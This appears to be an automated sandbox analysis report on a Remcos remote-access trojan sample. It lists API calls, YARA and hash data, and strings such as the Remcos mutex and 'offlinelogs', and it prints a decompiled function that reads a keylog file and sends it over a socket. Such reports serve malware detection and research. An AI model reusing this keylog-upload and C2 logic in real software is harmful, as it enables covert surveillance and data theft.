                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040CE22
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040CE2C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE41
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE4A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE53
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE61
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE75
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE7E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE87
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$D@std@@@std@@$??0?$basic_string@$?close@?$basic_ifstream@D@1@@V10@@V12@$??0?$basic_ifstream@??2@?c_str@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@H@2@V01@@V?$fpos@W4seekdir@ios_base@2@@__aulldivconnectfree
                                          • String ID: err_notopenfile$filedown
                                          • API String ID: 289020620-2089879270
                                          • Opcode ID: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                                          • Instruction ID: 75517663f7f8035d4815827909ffde7696f2aa65873f957ae4acf3b8a579f94d
                                          • Opcode Fuzzy Hash: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                                          • Instruction Fuzzy Hash: 12B13171D0011EDBDF14EBA0ED899DEBB78BF55304F1041B6F506A2091EA785E89CFA8
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                          • Process32First.KERNEL32(?,?), ref: 00407E79
                                          • Process32Next.KERNEL32 ref: 00407E88
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000128), ref: 00407EA8
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                          • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                          • Process32Next.KERNEL32 ref: 00407EFF
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F59
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00407F80
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F89
                                          • CloseHandle.KERNEL32(?,?,00000128), ref: 00407F92
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F99
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FA8
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FBC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(Program Files\,00000000), ref: 00407FDF
                                          • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,?,Program Files (x86)\), ref: 00408004
                                          • ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00408015
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408029
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408037
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(?,00000025,00000001), ref: 0040804E
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040805A
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00408072
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040808B
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 0040809D
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 004080B3
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 004080BF
                                          • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 004080CD
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004080D9
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 004080F7
                                          • CloseHandle.KERNEL32(00000000), ref: 00408110
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408121
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040812A
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040813A
                                            • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                            • Part of subcall function 0040F0DF: IsWow64Process.KERNEL32(00000000,?,?,00407F70,?), ref: 0040F100
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??8std@@V?$basic_string@$D@2@@0@V12@$Process32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateD?$basic_ifstream@D@1@@HandleNextProcessV01@V01@@$??0?$basic_ifstream@??2@?assign@?$basic_string@?close@?$basic_ifstream@?end@?$basic_string@?find@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?replace@?$basic_string@?seekg@?$basic_istream@?tellg@?$basic_istream@D@2@@0@0@D@2@@0@@FileFirstH@2@ModuleMutexNameOpenSnapshotToolhelp32V12@@V?$fpos@W4seekdir@ios_base@2@@Wow64
                                          • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                          • API String ID: 3809396517-694575909
                                          • Opcode ID: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                                          • Instruction ID: b1c41ab4f00258a1a6098e1fdbc2013eb857e20770a4aaf06870f1c586b70205
                                          • Opcode Fuzzy Hash: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                                          • Instruction Fuzzy Hash: 21913E7290011AABCF14DBA0DD5DAEE7B78EF14315F1040BAF506B60A1DF785ACACB58
                                           Uniqueness
                                           • Uniqueness Score: -1.00%
                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,7313CB00), ref: 0040C652
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668,?,00000000,7313CB00), ref: 0040C674
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(7313CB00), ref: 0040C687
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C690
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 0040C6AD
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040C6BA
                                          • realloc.MSVCRT ref: 0040C6C7
                                          • recv.WS2_32(00000000,00000000,00001388,00000000), ref: 0040C6DA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000,00000000,00001388,00000000), ref: 0040C6F2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C6FC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C705
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C712
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 0040C731
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C740
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C74A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C764
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00001388), ref: 0040C77E
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C79A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C7B3
                                          • _itoa.MSVCRT ref: 0040C7CD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,uploadprogress,00415268,?), ref: 0040C7F0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 0040C7FA
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040C80D
                                          • free.MSVCRT(00000000,00000000,00000000,00001388,00000000), ref: 0040C823
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C831
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C83A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C843
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C855
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C868
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C872
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C88C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C895
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 0040C8AB
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C8B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8BE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C8CB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8D4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8DD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??4?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$?data@?$basic_string@?empty@?$basic_string@?length@?$basic_string@Hstd@@$??9std@@?c_str@?$basic_string@?size@?$basic_string@$?substr@?$basic_string@A?$basic_string@V10@V10@0@V10@@V12@Y?$basic_string@_itoafreereallocrecvsend
                                          • String ID: uploadprogress
                                          • API String ID: 1859615858-2474510805
                                          • Opcode ID: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                                          • Instruction ID: 86ffff36a635555f350e847bfc49deda06467b1ca712684e8777b20748256a1b
                                          • Opcode Fuzzy Hash: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                                          • Instruction Fuzzy Hash: 4E81FB7290011AABCF04EBA0ED9D9ED7738BF54305F1481AAF506A21A0DFB85A49CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 18%
                                          			E00403D9A(void* __ecx, char _a4, char _a7) {
                                          				intOrPtr _v8;
                                          				char _v9;
                                          				char _v28;
                                          				char _v44;
                                          				char _v60;
                                          				char _v76;
                                          				char _v84;
                                          				char _v100;
                                          				char _v164;
                                          				void* _v308;
                                          				char _v1344;
                                          				void* _t59;
                                          				char* _t61;
                                          				char* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				intOrPtr _t67;
                                          				char* _t68;
                                          				char* _t70;
                                          				char* _t72;
                                          				char* _t73;
                                          				char* _t74;
                                          				void* _t75;
                                          				char* _t83;
                                          				char* _t84;
                                          				char* _t85;
                                          				void* _t86;
                                          				void* _t87;
                                          				intOrPtr _t134;
                                          				void* _t142;
                                          				void* _t143;
                                          
                                          				_t86 = __ecx;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v9);
                                          				if(_a4 == 0) {
                                          					_push("offlinelogs");
                                          				} else {
                                          					_push("autofflinelogs");
                                          				}
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                          				E004020E1( &_v164, 1);
                                          				_t143 = _t142 - 0x10;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				_t59 = E00402168( &_v164);
                                          				__imp__?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ();
                                          				if(_t59 != 0) {
                                          					L10:
                                          					_t87 = _t86 + 0x70;
                                          					__eflags = _t87;
                                          					_t61 =  &_v44;
                                          					L0040FC14();
                                          					_t62 =  &_v76;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t63 = E00402198( &_v164, _t143 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t62, _t62, _t61, _t61,  &_v28, 0x415268, 0x415268, _t87);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					E004021C7(_t63,  &_v164);
                                          				} else {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x25, 1);
                                          					__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t59);
                                          					__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          					_t160 = _t59;
                                          					if(_t59 == 0) {
                                          						__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						goto L10;
                                          					} else {
                                          						__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ( &_v84);
                                          						_t67 = E00405288( &_v84);
                                          						_t134 = _t67;
                                          						L0040FCCC();
                                          						_v8 = _t67;
                                          						__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t134);
                                          						__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_v8, _t134);
                                          						__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						_t68 = E00401289(0x415940, _t160, 0x12);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						if( *_t68 != 1) {
                                          							_t31 = _t86 + 0x70; // 0x415730
                                          							_t70 =  &_a7;
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_v8, _t134, _t70, 0x415268, _t31);
                                          							_t72 =  &_v100;
                                          							L0040FC14();
                                          							_t73 =  &_v44;
                                          							L0040FC14();
                                          							_t74 =  &_v76;
                                          							L0040FC14();
                                          							L0040FC14();
                                          							_t75 = E00402198( &_v164, _t143 - 0x10);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t74, _t74, _t73, _t73, _t72, _t72,  &_v28, 0x415268, _t70);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						} else {
                                          							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							E004028EB( &_v1344, _t68, _t68);
                                          							E00402A2A( &_v1344,  &_v60, _v8, _t134);
                                          							_t83 =  &_v76;
                                          							L0040FC14();
                                          							_t84 =  &_v44;
                                          							L0040FC14();
                                          							_t85 =  &_v100;
                                          							L0040FC14();
                                          							L0040FC14();
                                          							_t75 = E00402198( &_v164, _t143 - 0x10);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t85, _t85, _t84, _t84, _t83, _t83,  &_v28, 0x415268,  &_v60, 0x415268, _t86 + 0x70);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						E004021C7(E0040FC2C(_t75, _v8),  &_v164);
                                          						__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          					}
                                          				}
                                          				_t65 = E004021D6( &_v164);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t65;
                                          			}

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00), ref: 00403DAF
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(offlinelogs), ref: 00403DCA
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403DFB
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403E0F
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403E1C
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403E28
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403E40
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403E50
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403E63
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,00000000), ref: 00403E73
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403E7F
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403E93
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403EA9
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403EB2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00415268,?,00415268,00415650), ref: 00403EF3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00415650), ref: 00403F00
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415650), ref: 00403F0D
